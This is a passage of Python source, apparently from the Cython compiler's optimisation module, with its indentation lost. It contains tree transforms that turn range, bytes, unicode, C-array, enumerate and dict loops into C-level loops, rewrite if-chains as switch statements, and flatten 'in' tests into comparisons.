# range() iteration?
if Options.convert_range and node.target.type.is_int:
if iterator.self is None and function.is_name and \
function.entry and function.entry.is_builtin and \
function.name in ('range', 'xrange'):
return self._transform_range_iteration(node, iterator, reversed=reversed)
return node
def _transform_reversed_iteration(self, node, reversed_function):
args = reversed_function.arg_tuple.args
if len(args) == 0:
error(reversed_function.pos,
"reversed() requires an iterable argument")
return node
elif len(args) > 1:
error(reversed_function.pos,
"reversed() takes exactly 1 argument")
return node
arg = args[0]
# reversed(list/tuple) ?
if arg.type in (Builtin.tuple_type, Builtin.list_type):
node.iterator.sequence = arg.as_none_safe_node("'NoneType' object is not iterable")
node.iterator.reversed = True
return node
return self._optimise_for_loop(node, arg, reversed=True)
PyBytes_AS_STRING_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_char_ptr_type, [
PyrexTypes.CFuncTypeArg("s", Builtin.bytes_type, None)
])
PyBytes_GET_SIZE_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("s", Builtin.bytes_type, None)
])
def _transform_bytes_iteration(self, node, slice_node, reversed=False):
target_type = node.target.type
if not target_type.is_int and target_type is not Builtin.bytes_type:
# bytes iteration returns bytes objects in Py2, but
# integers in Py3
return node
unpack_temp_node = UtilNodes.LetRefNode(
slice_node.as_none_safe_node("'NoneType' is not iterable"))
slice_base_node = ExprNodes.PythonCapiCallNode(
slice_node.pos, "PyBytes_AS_STRING",
self.PyBytes_AS_STRING_func_type,
args = [unpack_temp_node],
is_temp = 0,
)
len_node = ExprNodes.PythonCapiCallNode(
slice_node.pos, "PyBytes_GET_SIZE",
self.PyBytes_GET_SIZE_func_type,
args = [unpack_temp_node],
is_temp = 0,
)
return UtilNodes.LetNode(
unpack_temp_node,
self._transform_carray_iteration(
node,
ExprNodes.SliceIndexNode(
slice_node.pos,
base = slice_base_node,
start = None,
step = None,
stop = len_node,
type = slice_base_node.type,
is_temp = 1,
),
reversed = reversed))
PyUnicode_READ_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ucs4_type, [
PyrexTypes.CFuncTypeArg("kind", PyrexTypes.c_int_type, None),
PyrexTypes.CFuncTypeArg("data", PyrexTypes.c_void_ptr_type, None),
PyrexTypes.CFuncTypeArg("index", PyrexTypes.c_py_ssize_t_type, None)
])
init_unicode_iteration_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_int_type, [
PyrexTypes.CFuncTypeArg("s", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("length", PyrexTypes.c_py_ssize_t_ptr_type, None),
PyrexTypes.CFuncTypeArg("data", PyrexTypes.c_void_ptr_ptr_type, None),
PyrexTypes.CFuncTypeArg("kind", PyrexTypes.c_int_ptr_type, None)
],
exception_value = '-1')
def _transform_unicode_iteration(self, node, slice_node, reversed=False):
if slice_node.is_literal:
# try to reduce to byte iteration for plain Latin-1 strings
try:
bytes_value = BytesLiteral(slice_node.value.encode('latin1'))
except UnicodeEncodeError:
pass
else:
bytes_slice = ExprNodes.SliceIndexNode(
slice_node.pos,
base=ExprNodes.BytesNode(
slice_node.pos, value=bytes_value,
constant_result=bytes_value,
type=PyrexTypes.c_char_ptr_type).coerce_to(
PyrexTypes.c_uchar_ptr_type, self.current_env()),
start=None,
stop=ExprNodes.IntNode(
slice_node.pos, value=str(len(bytes_value)),
constant_result=len(bytes_value),
type=PyrexTypes.c_py_ssize_t_type),
type=Builtin.unicode_type, # hint for Python conversion
)
return self._transform_carray_iteration(node, bytes_slice, reversed)
unpack_temp_node = UtilNodes.LetRefNode(
slice_node.as_none_safe_node("'NoneType' is not iterable"))
start_node = ExprNodes.IntNode(
node.pos, value='0', constant_result=0, type=PyrexTypes.c_py_ssize_t_type)
length_temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
end_node = length_temp.ref(node.pos)
if reversed:
relation1, relation2 = '>', '>='
start_node, end_node = end_node, start_node
else:
relation1, relation2 = '<=', '<'
kind_temp = UtilNodes.TempHandle(PyrexTypes.c_int_type)
data_temp = UtilNodes.TempHandle(PyrexTypes.c_void_ptr_type)
counter_temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
target_value = ExprNodes.PythonCapiCallNode(
slice_node.pos, "__Pyx_PyUnicode_READ",
self.PyUnicode_READ_func_type,
args = [kind_temp.ref(slice_node.pos),
data_temp.ref(slice_node.pos),
counter_temp.ref(node.target.pos)],
is_temp = False,
)
if target_value.type != node.target.type:
target_value = target_value.coerce_to(node.target.type,
self.current_env())
target_assign = Nodes.SingleAssignmentNode(
pos = node.target.pos,
lhs = node.target,
rhs = target_value)
body = Nodes.StatListNode(
node.pos,
stats = [target_assign, node.body])
loop_node = Nodes.ForFromStatNode(
node.pos,
bound1=start_node, relation1=relation1,
target=counter_temp.ref(node.target.pos),
relation2=relation2, bound2=end_node,
step=None, body=body,
else_clause=node.else_clause,
from_range=True)
setup_node = Nodes.ExprStatNode(
node.pos,
expr = ExprNodes.PythonCapiCallNode(
slice_node.pos, "__Pyx_init_unicode_iteration",
self.init_unicode_iteration_func_type,
args = [unpack_temp_node,
ExprNodes.AmpersandNode(slice_node.pos, operand=length_temp.ref(slice_node.pos),
type=PyrexTypes.c_py_ssize_t_ptr_type),
ExprNodes.AmpersandNode(slice_node.pos, operand=data_temp.ref(slice_node.pos),
type=PyrexTypes.c_void_ptr_ptr_type),
ExprNodes.AmpersandNode(slice_node.pos, operand=kind_temp.ref(slice_node.pos),
type=PyrexTypes.c_int_ptr_type),
],
is_temp = True,
result_is_used = False,
utility_code=UtilityCode.load_cached("unicode_iter", "Optimize.c"),
))
return UtilNodes.LetNode(
unpack_temp_node,
UtilNodes.TempsBlockNode(
node.pos, temps=[counter_temp, length_temp, data_temp, kind_temp],
body=Nodes.StatListNode(node.pos, stats=[setup_node, loop_node])))
def _transform_carray_iteration(self, node, slice_node, reversed=False):
neg_step = False
if isinstance(slice_node, ExprNodes.SliceIndexNode):
slice_base = slice_node.base
start = filter_none_node(slice_node.start)
stop = filter_none_node(slice_node.stop)
step = None
if not stop:
if not slice_base.type.is_pyobject:
error(slice_node.pos, "C array iteration requires known end index")
return node
elif isinstance(slice_node, ExprNodes.IndexNode):
assert isinstance(slice_node.index, ExprNodes.SliceNode)
slice_base = slice_node.base
index = slice_node.index
start = filter_none_node(index.start)
stop = filter_none_node(index.stop)
step = filter_none_node(index.step)
if step:
if not isinstance(step.constant_result, (int,long)) \
or step.constant_result == 0 \
or step.constant_result > 0 and not stop \
or step.constant_result < 0 and not start:
if not slice_base.type.is_pyobject:
error(step.pos, "C array iteration requires known step size and end index")
return node
else:
# step sign is handled internally by ForFromStatNode
step_value = step.constant_result
if reversed:
step_value = -step_value
neg_step = step_value < 0
step = ExprNodes.IntNode(step.pos, type=PyrexTypes.c_py_ssize_t_type,
value=str(abs(step_value)),
constant_result=abs(step_value))
elif slice_node.type.is_array:
if slice_node.type.size is None:
error(slice_node.pos, "C array iteration requires known end index")
return node
slice_base = slice_node
start = None
stop = ExprNodes.IntNode(
slice_node.pos, value=str(slice_node.type.size),
type=PyrexTypes.c_py_ssize_t_type, constant_result=slice_node.type.size)
step = None
else:
if not slice_node.type.is_pyobject:
error(slice_node.pos, "C array iteration requires known end index")
return node
if start:
start = start.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
if stop:
stop = stop.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
if stop is None:
if neg_step:
stop = ExprNodes.IntNode(
slice_node.pos, value='-1', type=PyrexTypes.c_py_ssize_t_type, constant_result=-1)
else:
error(slice_node.pos, "C array iteration requires known step size and end index")
return node
if reversed:
if not start:
start = ExprNodes.IntNode(slice_node.pos, value="0", constant_result=0,
type=PyrexTypes.c_py_ssize_t_type)
# if step was provided, it was already negated above
start, stop = stop, start
ptr_type = slice_base.type
if ptr_type.is_array:
ptr_type = ptr_type.element_ptr_type()
carray_ptr = slice_base.coerce_to_simple(self.current_env())
if start and start.constant_result != 0:
start_ptr_node = ExprNodes.AddNode(
start.pos,
operand1=carray_ptr,
operator='+',
operand2=start,
type=ptr_type)
else:
start_ptr_node = carray_ptr
if stop and stop.constant_result != 0:
stop_ptr_node = ExprNodes.AddNode(
stop.pos,
operand1=ExprNodes.CloneNode(carray_ptr),
operator='+',
operand2=stop,
type=ptr_type
).coerce_to_simple(self.current_env())
else:
stop_ptr_node = ExprNodes.CloneNode(carray_ptr)
counter = UtilNodes.TempHandle(ptr_type)
counter_temp = counter.ref(node.target.pos)
if slice_base.type.is_string and node.target.type.is_pyobject:
# special case: char* -> bytes/unicode
if slice_node.type is Builtin.unicode_type:
target_value = ExprNodes.CastNode(
ExprNodes.DereferenceNode(
node.target.pos, operand=counter_temp,
type=ptr_type.base_type),
PyrexTypes.c_py_ucs4_type).coerce_to(
node.target.type, self.current_env())
else:
# char* -> bytes coercion requires slicing, not indexing
target_value = ExprNodes.SliceIndexNode(
node.target.pos,
start=ExprNodes.IntNode(node.target.pos, value='0',
constant_result=0,
type=PyrexTypes.c_int_type),
stop=ExprNodes.IntNode(node.target.pos, value='1',
constant_result=1,
type=PyrexTypes.c_int_type),
base=counter_temp,
type=Builtin.bytes_type,
is_temp=1)
elif node.target.type.is_ptr and not node.target.type.assignable_from(ptr_type.base_type):
# Allow iteration with pointer target to avoid copy.
target_value = counter_temp
else:
# TODO: can this safely be replaced with DereferenceNode() as above?
target_value = ExprNodes.IndexNode(
node.target.pos,
index=ExprNodes.IntNode(node.target.pos, value='0',
constant_result=0,
type=PyrexTypes.c_int_type),
base=counter_temp,
is_buffer_access=False,
type=ptr_type.base_type)
if target_value.type != node.target.type:
target_value = target_value.coerce_to(node.target.type,
self.current_env())
target_assign = Nodes.SingleAssignmentNode(
pos = node.target.pos,
lhs = node.target,
rhs = target_value)
body = Nodes.StatListNode(
node.pos,
stats = [target_assign, node.body])
relation1, relation2 = self._find_for_from_node_relations(neg_step, reversed)
for_node = Nodes.ForFromStatNode(
node.pos,
bound1=start_ptr_node, relation1=relation1,
target=counter_temp,
relation2=relation2, bound2=stop_ptr_node,
step=step, body=body,
else_clause=node.else_clause,
from_range=True)
return UtilNodes.TempsBlockNode(
node.pos, temps=[counter],
body=for_node)
def _transform_enumerate_iteration(self, node, enumerate_function):
args = enumerate_function.arg_tuple.args
if len(args) == 0:
error(enumerate_function.pos,
"enumerate() requires an iterable argument")
return node
elif len(args) > 2:
error(enumerate_function.pos,
"enumerate() takes at most 2 arguments")
return node
if not node.target.is_sequence_constructor:
# leave this untouched for now
return node
targets = node.target.args
if len(targets) != 2:
# leave this untouched for now
return node
enumerate_target, iterable_target = targets
counter_type = enumerate_target.type
if not counter_type.is_pyobject and not counter_type.is_int:
# nothing we can do here, I guess
return node
if len(args) == 2:
start = unwrap_coerced_node(args[1]).coerce_to(counter_type, self.current_env())
else:
start = ExprNodes.IntNode(enumerate_function.pos,
value='0',
type=counter_type,
constant_result=0)
temp = UtilNodes.LetRefNode(start)
inc_expression = ExprNodes.AddNode(
enumerate_function.pos,
operand1 = temp,
operand2 = ExprNodes.IntNode(node.pos, value='1',
type=counter_type,
constant_result=1),
operator = '+',
type = counter_type,
#inplace = True, # not worth using in-place operation for Py ints
is_temp = counter_type.is_pyobject
)
loop_body = [
Nodes.SingleAssignmentNode(
pos = enumerate_target.pos,
lhs = enumerate_target,
rhs = temp),
Nodes.SingleAssignmentNode(
pos = enumerate_target.pos,
lhs = temp,
rhs = inc_expression)
]
if isinstance(node.body, Nodes.StatListNode):
node.body.stats = loop_body + node.body.stats
else:
loop_body.append(node.body)
node.body = Nodes.StatListNode(
node.body.pos,
stats = loop_body)
node.target = iterable_target
node.item = node.item.coerce_to(iterable_target.type, self.current_env())
node.iterator.sequence = args[0]
# recurse into loop to check for further optimisations
return UtilNodes.LetNode(temp, self._optimise_for_loop(node, node.iterator.sequence))
def _find_for_from_node_relations(self, neg_step_value, reversed):
if reversed:
if neg_step_value:
return '<', '<='
else:
return '>', '>='
else:
if neg_step_value:
return '>=', '>'
else:
return '<=', '<'
def _transform_range_iteration(self, node, range_function, reversed=False):
args = range_function.arg_tuple.args
if len(args) < 3:
step_pos = range_function.pos
step_value = 1
step = ExprNodes.IntNode(step_pos, value='1',
constant_result=1)
else:
step = args[2]
step_pos = step.pos
if not isinstance(step.constant_result, (int, long)):
# cannot determine step direction
return node
step_value = step.constant_result
if step_value == 0:
# will lead to an error elsewhere
return node
if reversed and step_value not in (1, -1):
# FIXME: currently broken - requires calculation of the correct bounds
return node
if not isinstance(step, ExprNodes.IntNode):
step = ExprNodes.IntNode(step_pos, value=str(step_value),
constant_result=step_value)
if len(args) == 1:
bound1 = ExprNodes.IntNode(range_function.pos, value='0',
constant_result=0)
bound2 = args[0].coerce_to_integer(self.current_env())
else:
bound1 = args[0].coerce_to_integer(self.current_env())
bound2 = args[1].coerce_to_integer(self.current_env())
relation1, relation2 = self._find_for_from_node_relations(step_value < 0, reversed)
if reversed:
bound1, bound2 = bound2, bound1
if step_value < 0:
step_value = -step_value
else:
if step_value < 0:
step_value = -step_value
step.value = str(step_value)
step.constant_result = step_value
step = step.coerce_to_integer(self.current_env())
if not bound2.is_literal:
# stop bound must be immutable => keep it in a temp var
bound2_is_temp = True
bound2 = UtilNodes.LetRefNode(bound2)
else:
bound2_is_temp = False
for_node = Nodes.ForFromStatNode(
node.pos,
target=node.target,
bound1=bound1, relation1=relation1,
relation2=relation2, bound2=bound2,
step=step, body=node.body,
else_clause=node.else_clause,
from_range=True)
if bound2_is_temp:
for_node = UtilNodes.LetNode(bound2, for_node)
return for_node
def _transform_dict_iteration(self, node, dict_obj, method, keys, values):
temps = []
temp = UtilNodes.TempHandle(PyrexTypes.py_object_type)
temps.append(temp)
dict_temp = temp.ref(dict_obj.pos)
temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
temps.append(temp)
pos_temp = temp.ref(node.pos)
key_target = value_target = tuple_target = None
if keys and values:
if node.target.is_sequence_constructor:
if len(node.target.args) == 2:
key_target, value_target = node.target.args
else:
# unusual case that may or may not lead to an error
return node
else:
tuple_target = node.target
elif keys:
key_target = node.target
else:
value_target = node.target
if isinstance(node.body, Nodes.StatListNode):
body = node.body
else:
body = Nodes.StatListNode(pos = node.body.pos,
stats = [node.body])
# keep original length to guard against dict modification
dict_len_temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
temps.append(dict_len_temp)
dict_len_temp_addr = ExprNodes.AmpersandNode(
node.pos, operand=dict_len_temp.ref(dict_obj.pos),
type=PyrexTypes.c_ptr_type(dict_len_temp.type))
temp = UtilNodes.TempHandle(PyrexTypes.c_int_type)
temps.append(temp)
is_dict_temp = temp.ref(node.pos)
is_dict_temp_addr = ExprNodes.AmpersandNode(
node.pos, operand=is_dict_temp,
type=PyrexTypes.c_ptr_type(temp.type))
iter_next_node = Nodes.DictIterationNextNode(
dict_temp, dict_len_temp.ref(dict_obj.pos), pos_temp,
key_target, value_target, tuple_target,
is_dict_temp)
iter_next_node = iter_next_node.analyse_expressions(self.current_env())
body.stats[0:0] = [iter_next_node]
if method:
method_node = ExprNodes.StringNode(
dict_obj.pos, is_identifier=True, value=method)
dict_obj = dict_obj.as_none_safe_node(
"'NoneType' object has no attribute '%s'",
error = "PyExc_AttributeError",
format_args = [method])
else:
method_node = ExprNodes.NullNode(dict_obj.pos)
dict_obj = dict_obj.as_none_safe_node("'NoneType' object is not iterable")
def flag_node(value):
value = value and 1 or 0
return ExprNodes.IntNode(node.pos, value=str(value), constant_result=value)
result_code = [
Nodes.SingleAssignmentNode(
node.pos,
lhs = pos_temp,
rhs = ExprNodes.IntNode(node.pos, value='0',
constant_result=0)),
Nodes.SingleAssignmentNode(
dict_obj.pos,
lhs = dict_temp,
rhs = ExprNodes.PythonCapiCallNode(
dict_obj.pos,
"__Pyx_dict_iterator",
self.PyDict_Iterator_func_type,
utility_code = UtilityCode.load_cached("dict_iter", "Optimize.c"),
args = [dict_obj, flag_node(dict_obj.type is Builtin.dict_type),
method_node, dict_len_temp_addr, is_dict_temp_addr,
],
is_temp=True,
)),
Nodes.WhileStatNode(
node.pos,
condition = None,
body = body,
else_clause = node.else_clause
)
]
return UtilNodes.TempsBlockNode(
node.pos, temps=temps,
body=Nodes.StatListNode(
node.pos,
stats = result_code
))
PyDict_Iterator_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("dict", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("is_dict", PyrexTypes.c_int_type, None),
PyrexTypes.CFuncTypeArg("method_name", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("p_orig_length", PyrexTypes.c_py_ssize_t_ptr_type, None),
PyrexTypes.CFuncTypeArg("p_is_dict", PyrexTypes.c_int_ptr_type, None),
])
class SwitchTransform(Visitor.VisitorTransform):
"""
This transformation tries to turn long if statements into C switch statements.
The requirement is that every clause be an (or of) var == value, where the var
is common among all clauses and both var and value are ints.
"""
NO_MATCH = (None, None, None)
def extract_conditions(self, cond, allow_not_in):
while True:
if isinstance(cond, (ExprNodes.CoerceToTempNode,
ExprNodes.CoerceToBooleanNode)):
cond = cond.arg
elif isinstance(cond, UtilNodes.EvalWithTempExprNode):
# this is what we get from the FlattenInListTransform
cond = cond.subexpression
elif isinstance(cond, ExprNodes.TypecastNode):
cond = cond.operand
else:
break
if isinstance(cond, ExprNodes.PrimaryCmpNode):
if cond.cascade is not None:
return self.NO_MATCH
elif cond.is_c_string_contains() and \
isinstance(cond.operand2, (ExprNodes.UnicodeNode, ExprNodes.BytesNode)):
not_in = cond.operator == 'not_in'
if not_in and not allow_not_in:
return self.NO_MATCH
if isinstance(cond.operand2, ExprNodes.UnicodeNode) and \
cond.operand2.contains_surrogates():
# dealing with surrogates leads to different
# behaviour on wide and narrow Unicode
# platforms => refuse to optimise this case
return self.NO_MATCH
return not_in, cond.operand1, self.extract_in_string_conditions(cond.operand2)
elif not cond.is_python_comparison():
if cond.operator == '==':
not_in = False
elif allow_not_in and cond.operator == '!=':
not_in = True
else:
return self.NO_MATCH
# this looks somewhat silly, but it does the right
# checks for NameNode and AttributeNode
if is_common_value(cond.operand1, cond.operand1):
if cond.operand2.is_literal:
return not_in, cond.operand1, [cond.operand2]
elif getattr(cond.operand2, 'entry', None) \
and cond.operand2.entry.is_const:
return not_in, cond.operand1, [cond.operand2]
if is_common_value(cond.operand2, cond.operand2):
if cond.operand1.is_literal:
return not_in, cond.operand2, [cond.operand1]
elif getattr(cond.operand1, 'entry', None) \
and cond.operand1.entry.is_const:
return not_in, cond.operand2, [cond.operand1]
elif isinstance(cond, ExprNodes.BoolBinopNode):
if cond.operator == 'or' or (allow_not_in and cond.operator == 'and'):
allow_not_in = (cond.operator == 'and')
not_in_1, t1, c1 = self.extract_conditions(cond.operand1, allow_not_in)
not_in_2, t2, c2 = self.extract_conditions(cond.operand2, allow_not_in)
if t1 is not None and not_in_1 == not_in_2 and is_common_value(t1, t2):
if (not not_in_1) or allow_not_in:
return not_in_1, t1, c1+c2
return self.NO_MATCH
def extract_in_string_conditions(self, string_literal):
if isinstance(string_literal, ExprNodes.UnicodeNode):
charvals = list(map(ord, set(string_literal.value)))
charvals.sort()
return [ ExprNodes.IntNode(string_literal.pos, value=str(charval),
constant_result=charval)
for charval in charvals ]
else:
# this is a bit tricky as Py3's bytes type returns
# integers on iteration, whereas Py2 returns 1-char byte
# strings
characters = string_literal.value
characters = list(set([ characters[i:i+1] for i in range(len(characters)) ]))
characters.sort()
return [ ExprNodes.CharNode(string_literal.pos, value=charval,
constant_result=charval)
for charval in characters ]
def extract_common_conditions(self, common_var, condition, allow_not_in):
not_in, var, conditions = self.extract_conditions(condition, allow_not_in)
if var is None:
return self.NO_MATCH
elif common_var is not None and not is_common_value(var, common_var):
return self.NO_MATCH
elif not (var.type.is_int or var.type.is_enum) or sum([not (cond.type.is_int or cond.type.is_enum) for cond in conditions]):
return self.NO_MATCH
return not_in, var, conditions
def has_duplicate_values(self, condition_values):
# duplicated values don't work in a switch statement
seen = set()
for value in condition_values:
if value.has_constant_result():
if value.constant_result in seen:
return True
seen.add(value.constant_result)
else:
# this isn't completely safe as we don't know the
# final C value, but this is about the best we can do
try:
if value.entry.cname in seen:
return True
except AttributeError:
return True # play safe
seen.add(value.entry.cname)
return False
def visit_IfStatNode(self, node):
common_var = None
cases = []
for if_clause in node.if_clauses:
_, common_var, conditions = self.extract_common_conditions(
common_var, if_clause.condition, False)
if common_var is None:
self.visitchildren(node)
return node
cases.append(Nodes.SwitchCaseNode(pos = if_clause.pos,
conditions = conditions,
body = if_clause.body))
condition_values = [
cond for case in cases for cond in case.conditions]
if len(condition_values) < 2:
self.visitchildren(node)
return node
if self.has_duplicate_values(condition_values):
self.visitchildren(node)
return node
common_var = unwrap_node(common_var)
switch_node = Nodes.SwitchStatNode(pos = node.pos,
test = common_var,
cases = cases,
else_clause = node.else_clause)
return switch_node
def visit_CondExprNode(self, node):
not_in, common_var, conditions = self.extract_common_conditions(
None, node.test, True)
if common_var is None \
or len(conditions) < 2 \
or self.has_duplicate_values(conditions):
self.visitchildren(node)
return node
return self.build_simple_switch_statement(
node, common_var, conditions, not_in,
node.true_val, node.false_val)
def visit_BoolBinopNode(self, node):
not_in, common_var, conditions = self.extract_common_conditions(
None, node, True)
if common_var is None \
or len(conditions) < 2 \
or self.has_duplicate_values(conditions):
self.visitchildren(node)
return node
return self.build_simple_switch_statement(
node, common_var, conditions, not_in,
ExprNodes.BoolNode(node.pos, value=True, constant_result=True),
ExprNodes.BoolNode(node.pos, value=False, constant_result=False))
def visit_PrimaryCmpNode(self, node):
not_in, common_var, conditions = self.extract_common_conditions(
None, node, True)
if common_var is None \
or len(conditions) < 2 \
or self.has_duplicate_values(conditions):
self.visitchildren(node)
return node
return self.build_simple_switch_statement(
node, common_var, conditions, not_in,
ExprNodes.BoolNode(node.pos, value=True, constant_result=True),
ExprNodes.BoolNode(node.pos, value=False, constant_result=False))
def build_simple_switch_statement(self, node, common_var, conditions,
not_in, true_val, false_val):
result_ref = UtilNodes.ResultRefNode(node)
true_body = Nodes.SingleAssignmentNode(
node.pos,
lhs = result_ref,
rhs = true_val,
first = True)
false_body = Nodes.SingleAssignmentNode(
node.pos,
lhs = result_ref,
rhs = false_val,
first = True)
if not_in:
true_body, false_body = false_body, true_body
cases = [Nodes.SwitchCaseNode(pos = node.pos,
conditions = conditions,
body = true_body)]
common_var = unwrap_node(common_var)
switch_node = Nodes.SwitchStatNode(pos = node.pos,
test = common_var,
cases = cases,
else_clause = false_body)
replacement = UtilNodes.TempResultFromStatNode(result_ref, switch_node)
return replacement
def visit_EvalWithTempExprNode(self, node):
# drop unused expression temp from FlattenInListTransform
orig_expr = node.subexpression
temp_ref = node.lazy_temp
self.visitchildren(node)
if node.subexpression is not orig_expr:
# node was restructured => check if temp is still used
if not Visitor.tree_contains(node.subexpression, temp_ref):
return node.subexpression
return node
visit_Node = Visitor.VisitorTransform.recurse_to_children
class FlattenInListTransform(Visitor.VisitorTransform, SkipDeclarations):
"""
This transformation flattens "x in [val1, ..., valn]" into a sequential list
of comparisons.
"""
def visit_PrimaryCmpNode(self, node):
self.visitchildren(node)
if node.cascade is not None:
return node
elif node.operator == 'in':
conjunction = 'or'
eq_or_neq = '=='
elif node.operator == 'not_in':
conjunction = 'and'
eq_or_neq = '!='
else:
return node
if not isinstance(node.operand2, (ExprNodes.TupleNode,
ExprNodes.ListNode,
ExprNodes.SetNode)):
return node
args = node.operand2.args
if len(args) == 0:
# note: lhs may have side effects
return node
lhs = UtilNodes.ResultRefNode(node.operand1)
conds = []
temps = []
for arg in args:
try:
# Trial optimisation to avoid redundant temp
# assignments. However, since is_simple() is meant to
# be called after type analysis, we ignore any errors
# and just play safe in that case.
is_simple_arg = arg.is_simple()
except Exception:
is_simple_arg = False
if not is_simple_arg:
# must evaluate all non-simple RHS before doing the comparisons
arg = UtilNodes.LetRefNode(arg)
temps.append(arg)
cond = ExprNodes.PrimaryCmpNode(
pos = node.pos,
operand1 = lhs,
operator = eq_or_neq,
operand2 = arg,
cascade = None)
conds.append(ExprNodes.TypecastNode(
pos = node.pos,
operand = cond,
type = PyrexTypes.c_bint_type))
def concat(left, right):
return ExprNodes.BoolBinopNode(
pos = node.pos,
operator = conjunction,
operand1 = left,
operand2 = right)
condition = reduce(concat, conds)
new_node = UtilNodes.EvalWithTempExprNode(lhs, condition)
for temp in temps[::-1]:
new_node = UtilNodes.EvalWithTempExprNode(temp, new_node)
return new_node
visit_Node = Visitor.VisitorTransform.recurse_to_children
class DropRefcountingTransform(Visitor.VisitorTransform):
"""Drop ref-counting in safe places.
"""
visit_Node = Visitor.VisitorTransform.recurse_to_children
def visit_ParallelAssignmentNode(self, node):
"""
Parallel swap assignments like 'a,b = b,a' are safe.
"""
left_names, right_names = [], []
left_indices, right_indices = [], []
temps = []
for stat in node.stats:
if isinstance(stat, Nodes.SingleAssignmentNode):
if not self._extract_operand(stat.lhs, left_names,
left_indices, temps):
return node
if not self._extract_operand(stat.rhs, right_names,
right_indices, temps):
return node
elif isinstance(stat, Nodes.CascadedAssignmentNode):
# FIXME
return node
else:
return node
if left_names or right_names:
# lhs/rhs names must be a non-redundant permutation
lnames = [ path for path, n in left_names ]
rnames = [ path for path, n in right_names ]
if set(lnames) != set(rnames):
return node
if len(set(lnames)) != len(right_names):
return node
if left_indices or right_indices:
# base name and index of index nodes must be a
# non-redundant permutation
lindices = []
for lhs_node in left_indices:
index_id = self._extract_index_id(lhs_node)
if not index_id:
return node
lindices.append(index_id)
rindices = []
for rhs_node in right_indices:
index_id = self._extract_index_id(rhs_node)
if not index_id:
return node
rindices.append(index_id)
if set(lindices) != set(rindices):
return node
if len(set(lindices)) != len(right_indices):
return node
# really supporting IndexNode requires support in
# __Pyx_GetItemInt(), so let's stop short for now
return node
temp_args = [t.arg for t in temps]
for temp in temps:
temp.use_managed_ref = False
for _, name_node in left_names + right_names:
if name_node not in temp_args:
name_node.use_managed_ref = False
for index_node in left_indices + right_indices:
index_node.use_managed_ref = False
return node
def _extract_operand(self, node, names, indices, temps):
node = unwrap_node(node)
if not node.type.is_pyobject:
return False
if isinstance(node, ExprNodes.CoerceToTempNode):
temps.append(node)
node = node.arg
name_path = []
obj_node = node
while isinstance(obj_node, ExprNodes.AttributeNode):
if obj_node.is_py_attr:
return False
name_path.append(obj_node.member)
obj_node = obj_node.obj
if isinstance(obj_node, ExprNodes.NameNode):
name_path.append(obj_node.name)
names.append( ('.'.join(name_path[::-1]), node) )
elif isinstance(node, ExprNodes.IndexNode):
if node.base.type != Builtin.list_type:
return False
if not node.index.type.is_int:
return False
if not isinstance(node.base, ExprNodes.NameNode):
return False
indices.append(node)
else:
return False
return True
def _extract_index_id(self, index_node):
base = index_node.base
index = index_node.index
if isinstance(index, ExprNodes.NameNode):
index_val = index.name
elif isinstance(index, ExprNodes.ConstNode):
# FIXME:
return None
else:
return None
return (base.name, index_val)
class EarlyReplaceBuiltinCalls(Visitor.EnvTransform):
"""Optimize some common calls to builtin types *before* the type
analysis phase and *after* the declarations analysis phase.
This transform cannot make use of any argument types, but it can
restructure the tree in a way that the type analysis phase can
respond to.
Introducing C function calls here may not be a good idea. Move
them to the OptimizeBuiltinCalls transform instead, which runs
after type analysis.
"""
# only intercept on call nodes
visit_Node = Visitor.VisitorTransform.recurse_to_children
def visit_SimpleCallNode(self, node):
self.visitchildren(node)
function = node.function
if not self._function_is_builtin_name(function):
return node
return self._dispatch_to_handler(node, function, node.args)
def visit_GeneralCallNode(self, node):
self.visitchildren(node)
function = node.function
if not self._function_is_builtin_name(function):
return node
arg_tuple = node.positional_args
if not isinstance(arg_tuple, ExprNodes.TupleNode):
return node
args = arg_tuple.args
return self._dispatch_to_handler(
node, function, args, node.keyword_args)
def _function_is_builtin_name(self, function):
if not function.is_name:
return False
env = self.current_env()
entry = env.lookup(function.name)
if entry is not env.builtin_scope().lookup_here(function.name):
return False
# if entry is None, it's at least an undeclared name, so likely builtin
return True
def _dispatch_to_handler(self, node, function, args, kwargs=None):
if kwargs is None:
handler_name = '_handle_simple_function_%s' % function.name
else:
handler_name = '_handle_general_function_%s' % function.name
handle_call = getattr(self, handler_name, None)
if handle_call is not None:
if kwargs is None:
return handle_call(node, args)
else:
return handle_call(node, args, kwargs)
return node
def _inject_capi_function(self, node, cname, func_type, utility_code=None):
node.function = ExprNodes.PythonCapiFunctionNode(
node.function.pos, node.function.name, cname, func_type,
utility_code = utility_code)
def _error_wrong_arg_count(self, function_name, node, args, expected=None):
if not expected: # None or 0
arg_str = ''
elif isinstance(expected, basestring) or expected > 1:
arg_str = '...'
elif expected == 1:
arg_str = 'x'
else:
arg_str = ''
if expected is not None:
expected_str = 'expected %s, ' % expected
else:
expected_str = ''
error(node.pos, "%s(%s) called with wrong number of args, %sfound %d" % (
function_name, arg_str, expected_str, len(args)))
# specific handlers for simple call nodes
def _handle_simple_function_float(self, node, pos_args):
if not pos_args:
return ExprNodes.FloatNode(node.pos, value='0.0')
if len(pos_args) > 1:
self._error_wrong_arg_count('float', node, pos_args, 1)
arg_type = getattr(pos_args[0], 'type', None)
if arg_type in (PyrexTypes.c_double_type, Builtin.float_type):
return pos_args[0]
return node
class YieldNodeCollector(Visitor.TreeVisitor):
def __init__(self):
Visitor.TreeVisitor.__init__(self)
self.yield_stat_nodes = {}
self.yield_nodes = []
visit_Node = Visitor.TreeVisitor.visitchildren
# XXX: disable inlining while it's not back supported
def __visit_YieldExprNode(self, node):
self.yield_nodes.append(node)
self.visitchildren(node)
def __visit_ExprStatNode(self, node):
self.visitchildren(node)
